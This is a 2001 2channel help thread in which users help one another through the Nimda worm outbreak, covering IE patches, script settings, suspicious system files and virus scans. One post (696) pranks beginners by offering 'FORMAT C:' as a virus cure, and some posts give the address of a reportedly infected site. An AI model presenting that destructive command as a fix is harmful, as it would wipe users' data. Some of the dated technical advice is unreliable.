掲示板のスクリプトも最新になったね。
695 :01/09/19 20:41 ID:gxgcJyr2
質問なんですがp2pソフトつかってファイルのやり取り
する場合、感染する危険性あるんですか?相手がウイルス喰らってたりしたら。
696 :01/09/19 20:41 ID:XX3K0GAU
ウイルスのなおしかたおしえるよ、
DOSモードで起動して
FORMAT C:
と打ち込んでください。
あとはすべてYESを選んでください。
これで大丈夫です。
697 :01/09/19 20:42 ID:.R9N8RVQ
>>692
>>686>>680に答えてるつもりだろ。それくらい理解しろ。
698 :01/09/19 20:42 ID:ehK3v1x6
>>696
こらこら
699 :01/09/19 20:42 ID:HrDdE0AY
ごめん、確認させて。
SP2入れたらjava onにしても「変なファイル落としますか?」
っての気をつければいいんですよね?
java offなら、それすら表示されないでより安全なんだよね?
700 :01/09/19 20:42 ID:LoP9L.6A
>>696
 全部消えるわ!(藁
701 :01/09/19 20:43 ID:LRM32VyM
>696
スーパー初心者スレと銘打っているのだから、シャレにならない事は止めようね。
702  :01/09/19 20:43 ID:0vW2CaDA
>>680
スタート--->プログラム--->アクセサリ--->コマンドプロント
c:\>ipconfig
Ethernet adapter ローカル エリア接続:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : x.x.x.65 <---ココ
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : x.x.x.126

もしくは
C:\>netstat -an
Proto Local Address
TCP x.x.x.65:1868  <---ココ

のアドレスが自分のアドレスです。おのアドレスをIEのアドレスバーもしくは
フォルダーのアドレスを書くところに

\\192.115.10.3       

という風に自分のアドレスを入れてください、共有されていたら分かります。
なお、共有されていると、フォルダに手のマークが出ているので一目かと思います。
仮にフォルダ上で右クリックして、プロパティを選択すれば、共有するかどうかの
選択項目があるかと思います。(WIN2000)
703 :01/09/19 20:43 ID:se/qq7uk
>>693
いまのところIE6.0極めて快適だけど・・
704nanasisan:01/09/19 20:44 ID:VCih6ARI
>>697
補足感謝。どうも疲れてるらしい・・

ついでなのでお返事。
>>682
検出は出来たけど、駆除は時と場合によるらしい(現状は少なくとも)。
あまり期待しないほうが良いかも。
705 :01/09/19 20:44 ID:gxgcJyr2
初心者はDOSプロンプト開かないでしょ
706 :01/09/19 20:45 ID:W1IFJgxM
えっとまだ質問出てナインみたいなんですが
IEの5.00.2614.というバージョンは感染しないのでしょうか?
WIN98SEをいれたデフォの状態なんですけど。

一応調べたら現時点では感染してないみたいなのですが・・・
707nanasisan:01/09/19 20:45 ID:VCih6ARI
>>699
javaではなくて、javascriptです。
IEだと「スクリプト」のところ以下。
708:01/09/19 20:46 ID:yK7lM4Iw
>>696
店頭ので試したらパソコンがあぼーんしましたが何か?
709Ю:01/09/19 20:46 ID:m02G5IOM
本スレと関係ないかもしれませんが ”sage.exe” って何?
c:\system でヒットしたよ。
なんか怖いよ〜
助けてよ〜
710 :01/09/19 20:47 ID:LRM32VyM
>708
ネタだろうけどワラタ
711 :01/09/19 20:47 ID:xXMohiCc
>>706
感染します
712  :01/09/19 20:47 ID:0vW2CaDA

\\127.0.0.1

IEのアドレス、もしくは、フォルダのアドレス欄に\\127.0.0.1でもいいです。
713Ю:01/09/19 20:47 ID:m02G5IOM
本スレと関係ないかもしれませんが ”sage.exe” って何?
c:\system でヒットしたよ。
なんか怖いよ〜
助けてよ〜
714中級初心者:01/09/19 20:48 ID:s8XSdGgc
今、5.5sp2入れたら、今までどうやっても起動しなかった
Outlook Expressが使えるようになって感激した。
F士通のサポートセンターでもお手上げだったのに…。
んでもShuriken Pro買っちゃう前に直って欲しかったな。
715 :01/09/19 20:48 ID:LRM32VyM
>709
2ちゃん(ひろゆき)にIPが筒抜けになるウィルスです(嘘
716nanasisan:01/09/19 20:49 ID:VCih6ARI
>>713
まず真っ先に、2ちゃんねるとは無関係です。
何かの省略形でsageになるだけです。
Windowsのシステムファイルなので、ウイルスの直接的なファイルではありません。

心配ならオンラインウイルススキャンを。
717699:01/09/19 20:49 ID:HrDdE0AY
>>707
あ、はい。わかりました。
5.01SP2にしたから、もうそこを有効にしてもOKですよね。
ありがとうございました。
718CHRISTI:01/09/19 20:49 ID:qRY8meec
>>704
ありがとう。友達に伝えときます。
>>697
こっちは初心者でパニクッているの!そんなことまで頭まわんないよー。
719   :01/09/19 20:49 ID:WWsfs2Hg
>>706
がいしゅつです。
あなたのは「IE5.01SP2」以下、つまり放置してれば感染します。
今すぐアップデートしてください。
720エロ医務エッサイム:01/09/19 20:50 ID:HQM1BL.k
>>709
お、俺もヒットした・・・場所は、c:\windows\system だった。

Task Scheduler Sage Compatibility っていう正式名称で、
バージョンは 4.71.1972.1 だった。
IEのアップデートしたときのファイルかもしれない。
721  :01/09/19 20:50 ID:0vW2CaDA
>>713
マウスの右クリック--->プロパティ--->バージョン情報
みてみろよ。
722 :01/09/19 20:51 ID:LRM32VyM
>717
うpした後でも知らないファイルを「ダウンロードしますか?」と聞かれたら
キャンセルしなければ意味はないからね
723訂正:01/09/19 20:51 ID:HQM1BL.k
× >>709
○ >>713
724706:01/09/19 20:51 ID:NrUFwNFo
ありがとうございます。
今から急いでアップデートします。
725 :01/09/19 20:51 ID:4YsZA8ZQ
今日初めてパソコン買ったぜベイベー
726 :01/09/19 20:51 ID:xl/0vm/6
IE6をダウンロードして使ってます。
でも、「IE6はバグだらけだからやめとけ」という書き込みを
見たのですが本当ですか?
私は今のところ問題はないのですが、、、
727 :01/09/19 20:51 ID:F2AdiCCw
>>702

それなら
\\127.0.0.1\
としたほうがラク。

ところで、うちで試してみた感じだと、
どうやっても症状でないんだけど、そういう構成もあるのだろうか。

Windows2000 Professionalで、readme.exe実行しても、
*.emlの増殖もないし、ファイルの置き換えも起こらない。
メールも投げてないみたい。

あと思ったんだけど、ウイルスとワームは違うような気がするんだけど、
誰も気にならない?
ワームだったら該当ファイルとレジストリのホック消して再起動でいいけど、
ウイルスだったら怖い。
728名無しさん:01/09/19 20:52 ID:Sae9YU9w
ホットメールの受信トレイ見に行っても感染する?
729 :01/09/19 20:53 ID:NKzK6Wto
IE6にはできたんだけど、さらにjavaの設定いじらないとあかんの?
730699:01/09/19 20:53 ID:HrDdE0AY
>>722
ご丁寧にありがとうございました。
731nanasisan:01/09/19 20:54 ID:VCih6ARI
>>728
今現在は問題ない。少なくとも自分のアカウントでは。
732 :01/09/19 20:54 ID:wekcpjX.
オンラインウイルススキャンがMC AFEEウィルススキャンが
残っているため起動できません。 

アンインストールもできないの(泣)
733 :01/09/19 20:55 ID:Fdu8QPT2
>>729
IE6で感染したって人が過去スレにいますね
734nanasisan:01/09/19 20:55 ID:VCih6ARI
>>729
とりあえずの対応は完了しているので、あとは予期していないのに出てくる
「ダウンロードしますか?」をキャンセルすることだけ忘れずに。
あと感染していないかどうかのチェックも。
735名無しさん:01/09/19 20:55 ID:Sae9YU9w
>>731
ありがとうございます。今から見に行ってまいります。
736加藤:01/09/19 20:55 ID:aLIwLUDE
あん、わたしのにもあったわ。sage.exe
なによこれ?
737713=709:01/09/19 20:56 ID:m02G5IOM
先ずは多重カキコお詫びもうしあげます
>>713 >>721 さん有難うございます


しかしこの板で質問の答えを見る時、メール蘭みたり
斜めに読んでみたり忙しかったです。
738nanasisan:01/09/19 20:56 ID:VCih6ARI
>>736
>>716
(今度は間違えてないよな・・(^^;)
739名無しさん2.31J ◆LOLITAaA :01/09/19 20:57 ID:bX0LC2XI
sage.exeはSystemAgentかな。
タスクスケジューラを呼び出すやつ?
740おいおい:01/09/19 21:00 ID:XpJYzqVw
トルシエの世界っていうHPも汚染されているようだ

ttp://www.tnet-inc.com/tr/index.htm

ところでここをMacでみたんだけど大丈夫なんでしょうか?
741 :01/09/19 21:01 ID:KkG4r6CE
>726
6をダウンロードしようか迷っている>693です
色々見ていたらフレッツADSLで不具合が出ているとか…
私はフレッツなので思いっ切り躊躇しています。
ああどうしよう。
742 :01/09/19 21:01 ID:wyLXlK3k
MSのサイトからIE5.01SP2をダウソしたんだけど、
バージョン情報で確認すると5.00.3314、更新;;SP2;になってる。
コレデイイノ?ガイシュツだったらスマソ
743 :01/09/19 21:03 ID:yK7lM4Iw
>>740
感染済みでした。
744教えてください:01/09/19 21:04 ID:Zp7vMJB6
スレ違いどころか、板違いかもしれませんが・・・
ZAの警告の所にIPみたいの出るじゃないですかぁ。
これで、何が分かるんですか?
745 :01/09/19 21:05 ID:KDHN2rRM
>>741
止めた方が良いと思う
漏れはISDNだが、2ちゃんねるの特定の板が見れなくなったり
バグが多かった
結局5.01SP2にした
746 :01/09/19 21:06 ID:qq6rhHg6
>>745
2ちゃんねるの特定の板が見れないのは2ちゃんねる側のバグだとおもわれ。
747ななし:01/09/19 21:07 ID:MjPd0JhE
5.5SP2でADSLだけど問題なし。
ところでトレンドマイクロのオンラインチェックに入れない…一杯なの?
748 :01/09/19 21:07 ID:plawXAu.
tracert IP
解ってどうする?who is?
749 :01/09/19 21:08 ID:j3wQIAgQ
 
750 :01/09/19 21:13 ID:EynE1.9c
>>551
ほんとうにありがとう・・・
751名無しさん2000:01/09/19 21:13 ID:celyGT2I
ドライブの共有の話が出て来たけど、
俺はwin2000使ってるんだけどパソコン起動させるたびに
ドライブが共有する設定になってるんだけど、なぜですか?

共有しないの方にボタンを移動させても再起動すると戻っています。
752744:01/09/19 21:15 ID:Zp7vMJB6
>>748
どんな攻撃を受けようとしてたのかってのを
知りたい時は、どうしたら良いんですか?
753nanasisan:01/09/19 21:15 ID:VCih6ARI
>>751
それはOS上の機能で強制的に共有する("C$", "D$", etc.)ようになっているからです。
特に問題はありません。
754__:01/09/19 21:18 ID:3jkFkg92
スレ違いの教えてくんウザイ
755nanasisan:01/09/19 21:18 ID:VCih6ARI
>>752
どんな攻撃なのかはパケットをキャプチャするソフトウエア
(unix系ならtcpdump, Windows系ならSniffer(売り物)とか)
を使って解析するという方法しかないのでは。

ZoneAlarmである程度までなら解るとは思いますが。
756 :01/09/19 21:18 ID:plawXAu.
>744
このスレとは関係ないから
セキュ板で聞いてください。
たぶん痕跡がなければ答えは出ないけどね。
757 :01/09/19 21:18 ID:um1VlERs
ウチの部署はカンケーねーや…なんて思ってたら
アホ課長のPCがやられてたよ。。。ネット感染じゃなくて多分
共有フォルダからの感染だよ    ムカツク!
今見たらプリンターまで使えなくなってるよ〜〜
PCの環境によって症状に違いが出るのかね??

このまま帰ったら明日の朝、課長が大騒ぎだろうな…
まるで天地がひっくり返ったかのように大騒ぎだろうな…
でも今日、これから再インストールは嫌だなぁ。。。
なんかいい方法ないっすかね?>ALL
多分、漏れと同じ境遇のお人は多いと思われ
758a:01/09/19 21:19 ID:gFa/ijCk
759 :01/09/19 21:20 ID:LoP9L.6A
 OCNユーザ限定だけだけど、オンラインチェック受けられるサービス発見。
 OCNユーザは使ってみて。
http://www.ocn.ne.jp/ocn/mem/m_form/onlinescan/use.html
760 :01/09/19 21:20 ID:qq6rhHg6
>>757
激しく同意。
早く帰りたい。腹減ったー。
761名無しさん98sp2:01/09/19 21:21 ID:H46UXkRs
5.50をSP2に揚げたらぽこぽこ落ちるぞ。
その度に「報告しますか?」つてなんか通信しておもしろいから
放ってるけど。
762 :01/09/19 21:21 ID:qq6rhHg6
>>758
うざい。ふむなよ。感染するぞ。
763ななしななし:01/09/19 21:21 ID:BlkLvorM
先日IE5.5SP2をダウンロードしたんだけど、「IEに問題が発生しました」とか
いうダイアログが出てブラウザ全くたちあがんなかった。
強制終了も出来ず、コンセント切って結局5.01SP2にに戻した。
この状態で6.0DLしてもまた上手く行かない気がする・・・。
しかもウチフレッツだし(鬱
764ななし:01/09/19 21:23 ID:4Uzbg7FI
>>761
それWinが死にかけてる
Windows2000を入れ直せ
765よいしょ。:01/09/19 21:23 ID:0kJpk41I
1.IE5(;´Д`)
2.とりあえずMcAfeeだけどウイルススキャンしてみた→検出されず
3.ファイル検索で過去レスの3つの文字列を検索→検出されず
4.ただいまIE5.01SP2をあぷでーと中。

これで防げますか?ダウソ終わったらjavaとか切ろうと思うのですが。
日本語変だな・・・。どなたかお答えお願いします・・・。
766七資産:01/09/19 21:24 ID:hW565bek
>>714
Shuriken Proの方が使いやすいと思うけど

>>747
えっ、普通に入れるよ?
http://www.trendmicro.co.jp/hcall/scan.htm
767nanasisan:01/09/19 21:24 ID:VCih6ARI
>>757
とりあえず全てのPCからネットワークケーブルを外す。
かつ、接続しているハブの電源を落として、電源アダプタごと回収。

スイッチングハブのような高級ハブならポート単位でON/OFFできると思うので、
もしそのような環境なら全てのポート(自分が使っているモノは除いて)OFF。

すると明日は「つながらねーぞ」と片っ端から連絡があるはずなので、連絡が
あった順に手順を教えて、対応が完了したところからネットワークに繋げられる
ようにすると良い。
768 :01/09/19 21:25 ID:gzV2RVU2
フレッツISDNでIE5.5SP2だけど問題なくサクサク動いてるよ
769680です:01/09/19 21:25 ID:KlwuXEE2
>>686
遅れてすみません。
ありがとうございました!
さっそくやってみます、勉強不足でした。
770 :01/09/19 21:25 ID:S6NNxtPg
今回のは、イソテルのマッチポンプでしょ
771_:01/09/19 21:26 ID:Zp7vMJB6
>>747
JAVAとかアクティブXとか
切ってるんじゃないの?
切ってたらオンラインチェックできなくない?
772nanasisan:01/09/19 21:26 ID:VCih6ARI
>>765
McAfeeのパターンファイルは最新のモノ?
最新であれば問題ない。あとは社内とかのPCであれば共有フォルダ越しに
感染させられないよう注意。
773ここみろよ、修復方法:01/09/19 21:27 ID:XX3K0GAU
774通り掛かりの人:01/09/19 21:27 ID:svQwaFoY
皆良い人ばかりだ・・・
日本もまだまだ捨てたもんじゃないな・・・
775 :01/09/19 21:28 ID:57WZnc7g
JavaもJavaScriptも切ってるから漏れはだいじょび
776 :01/09/19 21:28 ID:ZLmWIMKs
NHK見れ!!
777 :01/09/19 21:28 ID:plawXAu.
NHKあげ
778 :01/09/19 21:28 ID:Ut1PoXGM
>>773
>>774
ワロタ
779よいしょ。:01/09/19 21:29 ID:0kJpk41I
>>772
最新にしてからスキャンしましたです。
あとは自宅の個人PCなので・・・大丈夫かな。

ありがとうございましたヽ(´ー`)ノチョピリアンシン
780 :01/09/19 21:29 ID:cd9RQlRQ
ほんとだ。。。NHKでやってる
781765さんじゃないけど:01/09/19 21:29 ID:wekcpjX.
McAfeeプレインストール版あるけどバージョン3なんです
HPでは更新は終了みたいだし・・・。
782  :01/09/19 21:29 ID:lGJgt.CY
NHKでニュースやってる
財務省でも感染だとさ
783nanasisan:01/09/19 21:30 ID:VCih6ARI
>>781
新しいバージョンを買うか、それでなければオンラインスキャン。
http://www.trendmicro.co.jp/hcall/scan.htm
784 :01/09/19 21:30 ID:LoP9L.6A
 官公庁『が』被害とか、被害発見40件って……
 警視庁の能力ってこの程度なのか?<NHK
785 :01/09/19 21:31 ID:gzV2RVU2
国内の被害は40件とか言ってたけど、その10倍以上は
被害あるよね?
786見るだけで感染、最悪ウイルス被害拡大:01/09/19 21:31 ID:Ziuevdw2
787 :01/09/19 21:32 ID:plawXAu.
2chだけで40件以上のカキコを見たけど(w
788 :01/09/19 21:33 ID:6NApNFWk
40件どころの騒ぎじゃない。ウチの研究室にはウチの大学だけでも十数個の
ホストから頻繁にアクセスしてるっちゅーねん。
789nanasisan:01/09/19 21:34 ID:VCih6ARI
>>785
100倍くらいはあるように思うのですが。気づいていないか被害届自体を出していないか・・
790名無し:01/09/19 21:34 ID:ILBtY2o2
2chだけにいれば感染しないの?
791781:01/09/19 21:34 ID:wekcpjX.
それをアンインストールしても消せないんだよね・・・。

だからオンラインスキャンもできない・・・。 
792_:01/09/19 21:35 ID:itG8WUNM
ie5.5sp2入れたらタスクスケジューラーがタスクバーから消えた。どーしよう。
そもそもタスクスケジューラーって何ですか?
793nanasisan:01/09/19 21:35 ID:VCih6ARI
>>791
きっとそれは必要なデータだけバックアップを取って再インストールしたほうが早いと思う・・

>>790
このスレにもあるけど、リンクを押さないように。
感染してるサイトに行ってしまうリンクが貼られているので。
794名無し:01/09/19 21:36 ID:ILBtY2o2
どうも。
795 :01/09/19 21:37 ID:LoP9L.6A
>>792
 定めた時間にアプリケーションを起動するその名の通りのスケジューラ。
 使ってないなら意味ないから無視!
796757:01/09/19 21:39 ID:um1VlERs
>>767 nanasisan
レスありがとさんです、それに朝からご苦労様です
多分、nanasisanに救われた人は今日だけでも4桁を越えたでしょう

でも、やっぱり今日中に何とかしておかないと…
プリントアウト出来ないだけでも大騒ぎして業務が止まる人達なので。。。
まぁ、漏れも似たようなレベルですが(w
再インストールじゃなくて、再セットアップでも復帰しませんかね?
それか感染して削除したファイルを探して、健康なファイルに入れ替えとか?
ダメかなぁ… カエリタイ!
797 :01/09/19 21:39 ID:quvJiyn.
スキャンしたらload.exeってのが引っ掛かったんだけど、これってシステムファイルですか?
修復も出来ないし、あぼーんするしかなさそう。
798747:01/09/19 21:39 ID:MjPd0JhE
セキュリティレベルも「中」にしてあるのに入れません。
内部サーバ−エラーと出ます。
トップページにはいけるのに↓へは無理。なんでだろう……
http://housecall.antivirus.com/housecall/start_jp.asp
799nanashi:01/09/19 21:39 ID:HFixfMC6

         ∧_∧ ♪
        ( ´_ゝ`)  まあ落ち着けよカスども 聞いてくださいkid rockで「Bawitaba」
     / ̄ヽ/,― 、\ o   。。。
.:☆   | ||三∪●)三m三三Ε∃.  +
.:*    \_.へ--イ |     ゚ ゚ ゚ ♪.
+:..♪.:。゚*.:..  / / | |      .::.
 ☆。:.+::..   | .|  | |☆:.°+    ☆.. :
   。*.:☆゚x(_):。|_)*+゚。::.☆ο::.+。 *ρ♪.:.
800680です:01/09/19 21:40 ID:P2IEeTiA
>>702
ありがとうございました。
801 :01/09/19 21:42 ID:exuvAMjI
今ESPNのサイトみてたんだけど、エンコードがいつのいまにかトルコ語になってたんだよね。
これってなんだろ、今までトルコ語エンコードなんてしたことないのに・・・。
802774:01/09/19 21:43 ID:Rqrem/Gc
               _____
                /    .//‐||  ==
               /∧_∧ ||  ||  / ̄ ̄ ̄ ̄ ̄
               /( ´_ゝ`)||_|| <  >>799ふーん
       ぎゃあ!!   / O⌒⊂ /     \_____
        ∧_∧ / ̄ ̄ ̄ ̄/  ̄    =====
      ∩( ´_ゝ` | ̄ ̄ ̄ ̄||_      ====
         \  ☆|□====□| __/   =====
         \  (========)__
    ドンッ!   (_)`ー―   `ー―
803 :01/09/19 21:43 ID:vArgEgZM
MSNコミュニティ(WEBスペース)は大丈夫?
804nanasisan:01/09/19 21:43 ID:VCih6ARI
>>796
> レスありがとさんです、それに朝からご苦労様です
いえいえ(__)

> プリントアウト出来ないだけでも大騒ぎして業務が止まる人達なので

業務を遂行するのと、セキュリティを守るのとどっちが大事なのかによると思います。
セキュリティを守るってことはユーザに対して一定の不便を強いてしまうことなのですから。

ウイルスをばらまいて企業の信頼を落とすのと、
業務を一時停止してお客さんに待ってもらうのと、
どっちが耐えられますか?ってことだと思います。
805 :01/09/19 21:44 ID:LoP9L.6A
>>801
 エンコードミスは結構よくあること。
 気にしたら負けさ!
806nanasisan:01/09/19 21:46 ID:VCih6ARI
>>803
コミュニティのページをいくつか見てみたけど、おそらく大丈夫と思われ。
心配ならIEのバージョンを上げましょう。
807 :01/09/19 21:46 ID:uIHq/q8o
あのー↓の修正プログラムを入れるだけじゃダメなんですか?
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
808792:01/09/19 21:47 ID:itG8WUNM
>>795
ありがと。ほっと一安心だーよ。
809nanasisan:01/09/19 21:48 ID:VCih6ARI
>>807
とりあえず今回の問題*だけ*を回避するならそれでもかまわない。
ただ、それ以外にも問題があるので、できればバージョンアップ。
810742:01/09/19 21:48 ID:B1Z24eBE
>>742です。
IE5.01SP2のバージョン情報は、5.01.****となるのでしょうか?
811 :01/09/19 21:49 ID:vArgEgZM
>>806
即レスどうもです。
812ん〜ま:01/09/19 21:49 ID:TWLvHZ.k
>>807
IEを使うのをやめればいい。
813nanasisan:01/09/19 21:49 ID:VCih6ARI
>>810
です。"SP2"が「更新バージョン」にあればOK。
814 :01/09/19 21:49 ID:kXOWfYUg
”Nimda”は”サーカム”と似た動作をしますが、
PC起動33分の1破壊モードや20分の1HDDあぼ〜んモードは
ありますか?

それと、マイドキュメントに入っている恥ずかしい写真が
アドレス帳のリスト全員に送られてしまうのでしょうか?

そうなると、人生があぼ〜んです。
815名無しさん:01/09/19 21:50 ID:MkQAsvbk
とりあえず、チェックしたが感染は無し。
5.5+SP2にアップデートしようとしたけど、ビジーで途中でストップ。
みんなやってんだねぇ(;´Д`)
816nanasisan:01/09/19 21:50 ID:VCih6ARI
817 :01/09/19 21:51 ID:uIHq/q8o
>809
そうですか・・・何故かバージョンアップが出来ないようなので
今日はとりあえずこれだけ入れておきます。

あと、これを入れるとスクリプトを無効にしなくても大丈夫と言うことでしょうか?
818nanasisan:01/09/19 21:52 ID:VCih6ARI
>>817
今回の問題だけならば大丈夫だけど、できればバージョンアップが成功するまでは
スクリプト周りは切っておきましょう。安心の意味合いが強いですが。
819 :01/09/19 21:52 ID:exuvAMjI
>>814
対処方法としてはとりあえず、その写真をUPしてみそ。
820810:01/09/19 21:52 ID:B1Z24eBE
>>813
ありがとうございます。
30分以上かかったのにバージョン情報が5.00.3314、更新;;SP2;だったので、
慌ててました。
821nanasisan:01/09/19 21:53 ID:VCih6ARI
>>819
こらこら、嘘を教えてはイカンぞ...

>>820
それでOKっす。
822757:01/09/19 21:54 ID:um1VlERs
>>804 nanasisan
>ウイルスをばらまいて企業の信頼を落とすのと、
>業務を一時停止してお客さんに待ってもらうのと、
>どっちが耐えられますか?ってことだと思います。

うう、まったくもってその通りです
でも、あの人達を説得する自信が無いなぁ,,,なんて思ってたら
とりあえずウイルス駆除&再セットアップ&プリンタドライバ再セットアップで
なんとか(表面上は)復帰したです
潜在的には多分、解決してないんでしょうね。。。
でも、症状が軽かった?かもしれんので、拡散防止をやれるだけやって
今日は帰ります!(Cドライプも開放してなかったし)
頑張って下さい!!>nanasisan
823 :01/09/19 21:55 ID:uIHq/q8o
>818
ありがとうございます。
明日CD-ROMをもらってきて頑張ってみます。
824820:01/09/19 21:56 ID:B1Z24eBE
あれっよく見たら、バージョン情報が5.01.****じゃないと
ダメってこと?    ガーーーーン
825システム"管理"してる人:01/09/19 21:56 ID:wYGc1z1A
は、落ち着かなくて今日眠れないっすね。
私は会社にいた時には知ってたけど、かなり軽視してた。
CODE RED対策は完璧だったので。

んで、今帰ってきてゆっくり2ch見てたら、どんどん鬱になってきた(ワラ

ここまでヤバイものとは思ってなかったので、
なんの対策もしないで退社してしまって今非常に激しく鬱。
せめてインターネットの常時回線ぐらいは抜いて帰るべきだった。

明日出社するまでに何も無いことをひたすら祈る(鬱鬱
みなさんどうですか?
826 :01/09/19 21:57 ID:LoP9L.6A
 悪い報告も出なくなったけど、ワクチンとかの良い報告も一向に出ないな…
827nanasisan:01/09/19 21:57 ID:VCih6ARI
>>822
ウイルスチェックの駆除で感染が取り除けていたら問題ないと思います。

ただ、駆除で稀に必要なファイルまで削除している可能性も捨てきれないので、
もしかしたら明日「うごかねーぞ」って呼び出される可能性があるかもしれません。

そのへんだけご注意を...
828nanasisan:01/09/19 22:00 ID:VCih6ARI
>>824
おおっ、見落としてました。少なくとも5.01でないとダメのようです...

>>825
> 明日出社するまでに何も無いことをひたすら祈る(鬱鬱

明日から1週間くらい旅に出ることを強くお勧めします(藁
もちろん携帯電話もPHSもインターネットメールも繋がらない場所に。
829:01/09/19 22:00 ID:BYEyAkxw
2ちゃんの引き篭もり、高給でやとえばいいのになあ、対策やってるお役所は。
830nanasisan:01/09/19 22:02 ID:VCih6ARI
>>829
ワシも出来れば雇いたいな・・(「出来れば」だけど)
紹介できる先はいくらでもあるぞ・・・
831         :01/09/19 22:03 ID:P53JBYco
>>824
大丈夫。
ttp://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm
見てみ。
5.01.....というバージョンは逆に存在しないみたいね。
832824:01/09/19 22:05 ID:B1Z24eBE
ttp://www.microsoft.com/windows/ie_intl/ja/download/
ここからIE5.01SP2選んだのに、ドーシテ5.00ナンダー
833nanasisan:01/09/19 22:05 ID:VCih6ARI
>>831
フォローありがとうです、、
そろそろ疲れてきてるのかな、間違いまくりで済まぬですm(__)m
834824:01/09/19 22:06 ID:B1Z24eBE
>>831、アリガトー
835 :01/09/19 22:06 ID:W2wzRDWw
昨日、5.5SP2にアップデートしてから終了しました。
さっき立ち上げてからしばらくしたら、
Microsoftの「重要な更新して下さい」が出たので
Windowsサイトを見に行ってみると、前に更新した
(更新履歴でもインストール済みになってる)
「セキュリティ問題の修正プログラム 2001年4月2日」が
更新されてないよ!って出てきたのですが、なぜなのでしょうか?
再ダウンロードすべきなんでしょうか?
836nanasisan:01/09/19 22:08 ID:VCih6ARI
>>835
IEのバージョンを上げたら修正プログラムが入っていない状態に戻ってしまったということ?
とりあえず再ダウンロードして適用しましょう。
IE5.5SP2では適用されていなかった修正なのではないかと。
837      :01/09/19 22:09 ID:P53JBYco
>>833
頼りにしています。がんばってください。
5.01といいながらバージョン番号を揃えないMS
が諸悪の根源。
838 :01/09/19 22:10 ID:RnSH4/E2
MSNのwindows up dateサイトで、いくらやっても「不明なエラーでインストールできませんでした」とでます。
IE5.5+SP2をDLしようとしてるんですが、いま混んでるんでしょーか??
839nanasisan:01/09/19 22:12 ID:VCih6ARI
>>837
ううっ、ありがとうですー
840nanasisan:01/09/19 22:14 ID:VCih6ARI
>>838
インストール時にはウイルスチェックをいったんOFFにしないといけないかも。
あと、インターネットオプションのActiveXのセキュリティ設定も要確認。
841751:01/09/19 22:14 ID:celyGT2I
>>753
遅ればせながらthanks!
842835:01/09/19 22:18 ID:W2wzRDWw
>>836 nanasisan
ありがとうございます。
今は混んでるのかダウンロードが
ストップしてしまったので後でやろうと思います。
843 :01/09/19 22:19 ID:uIHq/q8o
IEのセキュリティの設定を「高」にするのと
レベルのカスタマイズで色々設定するのとどっちが良いのですか?
とりあえず「スクリプト」が無効になっていれば大丈夫?
844ウィルスf:01/09/19 22:19 ID:cONzbF9s
845   :01/09/19 22:21 ID:xrrEreS.
高にしたらクッキー無効にならないっけ?
書き込みできないよ。個々に設定した方がいいと思う。
846nanasisan:01/09/19 22:21 ID:VCih6ARI
>>843
スクリプトまわりが「無効」になっていれば問題ないでしょう。
ただし、IEの古いバージョンだと「無効」が無視される問題もあったような気がしますので過信せぬよう・・・
847テレホ:01/09/19 22:22 ID:k3oIsIQw
テレホタイムはどうなるんだぁしょうなぁ。MSN
848名称未設定:01/09/19 22:23 ID:BIrIJCSU
>>747
トレンドマイクロのサイト全体がパンク寸前。
849nanasisan:01/09/19 22:23 ID:VCih6ARI
>>847
あと30分程か・・夜勤★氏の話だと今現在もテレホーダイタイムでの混雑は酷い
らしいので、今回のウイルスも広がりまくる可能性が否定できないなぁ...
850 :01/09/19 22:24 ID:uIHq/q8o
>845−846
レスありがとう。
851 :01/09/19 22:25 ID:P/uHVhD2
今日、ウイルスが実際に届きました。バカみたいに「このファイルを
落として実行してみます?」と聞くのが笑えた。

早速殺しましたけど。
852 :01/09/19 22:26 ID:MDwVX.qw
まあ、トレンドマイクロに入れないなら
このことには関係ないがファイアーウォール
もついでに入れとけ。
853 :01/09/19 22:26 ID:0AcMkOX6
このスレで今日半日お世話になったものです。すごく感謝しています。
また来て、感動した。涙出そう。
プロジェクトXをリアルタイムで生体験できた気分だ! 本当にスゴイ。
854 :01/09/19 22:27 ID:d/7aZE/g
スクリプト、ジャバ関係はほとんど無効にした。カキコできる範囲で。
テレホで一気に広がるだろうな。
855_:01/09/19 22:29 ID:C5v7dHUI
SP2にするためにie5setup.exeをダウンロードしてきて、
実行しましたが、タスクの署名とか言う所でインストールが終了してしまい、
インストールできません。どうすればいいでしょう?
856nanasisan:01/09/19 22:30 ID:VCih6ARI
>>855
「タスクスケジューラ」の問題かな。とりあえず無視して問題ないはず。
再起動後、ヘルプ->バージョン情報でバージョンを確認してくだされ・・
857 :01/09/19 22:30 ID:4YJKdDT.
JNBのログイン画面にアクセス出来ないのですが、これって
javascriptとActiveXをオフにしたせいでしょうか?
858マターリネット:01/09/19 22:30 ID:D3sF25rg
ドリカスはウイルス騒動もカヤの外・・・
859感染爆発:01/09/19 22:32 ID:k3oIsIQw
30分前〜。

テレホ接続の人々ネットにつなぐ。

MSN、ウィルスソフトサイト混雑。

つながんねー後でいっか。

ちゃんちゃん
860nanasisan:01/09/19 22:32 ID:VCih6ARI
>>857
JNBって? jnb.co.jp で良いのかな?
該当ページを見てみたけど、トップページからいきなりMacromedia Flashでした。
従って、ActiveXは少なくともONにしないといけないでしょう。
861855:01/09/19 22:32 ID:C5v7dHUI
>>856
再起動したんですが、更新バージョンがSP1のままなんですよ。
どうすれば・・
862   :01/09/19 22:34 ID:nbj3zvbY
ぴゅう太でよかったヽ(´ー`)ノ
863nanasisan:01/09/19 22:34 ID:VCih6ARI
>>861
とりあえずインストール時に行うべきこと。
(1) ウイルススキャンは一時的に止める
(2) タスクスケジューラも止める
(3) どうしてもダメなら明日まで待って素直にIE5.5SP2の入った雑誌やプロバイダの販促用CDをもらうor買う
が良いでしょう。
864 :01/09/19 22:35 ID:4YJKdDT.
>>860
ジャパン・ネット・バンクのログイン(取引)メニューのことです。
紛らわしくてごめんなさい!
865 :01/09/19 22:35 ID:d3VTxE7E
IE5.5 SP2なのに反応したYO!
ttp://www.tnet-inc.com/tr/index.htm
866nanasisan:01/09/19 22:35 ID:VCih6ARI
>>864
ちゃんとURLを示してねん :-)
867 :01/09/19 22:36 ID:.n2DOLYc
>>862
ワラタ。激しくワラタ。
868nanasisan:01/09/19 22:36 ID:VCih6ARI
>>865
IE5.5SP2とかIE6では「ダウンロードしますか?」って出てくるのでそこでキャンセルすれば良い。
